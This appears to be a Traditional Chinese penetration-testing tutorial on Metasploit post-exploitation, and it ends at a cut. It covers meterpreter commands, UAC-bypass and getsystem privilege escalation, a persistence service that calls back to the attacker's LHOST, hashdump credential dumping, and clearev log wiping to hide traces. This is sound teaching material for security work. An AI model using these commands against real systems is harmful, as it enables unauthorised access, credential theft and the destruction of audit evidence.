今天的分享會針對滲透後的操作。也就是當我們成功入侵目標系統後,我們能夠做些什麼,以及我們可以用哪些工具來實現這些目的。
background
或 bg
:將當前會話背景化,以便可以使用其他 Metasploit 模塊。exit
:退出 meterpreter shell。getuid
:顯示當前會話的用戶 ID。pwd
:顯示當前工作目錄。cd
:更改目錄。ls
或 dir
:列出當前目錄中的文件。cat
:查看文件內容。download
:從目標機器下載文件。upload
:上傳文件到目標機器。rm
:刪除指定文件。mkdir
:創建新目錄。arp
:顯示目標系統的 ARP 緩存。ifconfig
:查看目標系統的網絡接口。netstat
:顯示目標系統的當前網絡連接。execute -f calc
會在目標系統上打開計算機應用程式。ps
列出所有進程,然後使用 kill <process_id>
終止特定進程。在實際操作中,我們通常無法確定能否成功提升權限。過去有許多已被修補的漏洞,但目標可能未能修補某些漏洞,使其仍然容易受到攻擊。因此,我們需要嘗試多種技術,以找到有效的方式提升權限。
search bypass UAC
search 2024
use <module>
選擇模組,然後設置必要的參數。這些步驟將幫助我們利用Metasploit模組嘗試提升目標系統的權限。
接下來,我們將探討如何在目標系統上建立持久性(Persistence)。持久性是指在目標機器重新啟動後,能夠自動重新連接的功能。這是一個非常重要的步驟,因為它可以讓我們在系統重啟後依然保持對目標機器的訪問權限。
meterpreter
session。exploit/windows/local/persistence_service
模組。LHOST
為你的 Kali Linux 的 IP 地址。LPORT
為用於持久性連接的端口號,確保與其他正在使用的端口不同。run
命令運行持久性模組。reboot
命令重新啟動目標系統。multi/handler
監聽器,等待連接。LHOST
和 LPORT
與持久性模組中的設置保持一致。meterpreter
session。getuid
確認你已經是系統權限。完成持久性設置後,您將能在目標系統上保持持久訪問。
接下來,我們將探討一些有用的命令和後滲透模組。這些模組可以幫助我們在攻擊成功後,進一步利用目標系統並獲取更多有價值的信息。
search
命令在目標系統中搜尋特定類型的文件。search -F *.jpeg
。clearev
命令清除目標系統的應用程式、系統和安全日誌。search post/windows
指令查找所有可用的 Windows 後滲透模組。use
命令加載模組,例如:use post/windows/gather/hashdump
。getsystem
命令嘗試提升權限。clearev
之類的命令隱藏操作痕跡,以避免被追踪。最後讓我們回顧一下滲透測試的主要步驟: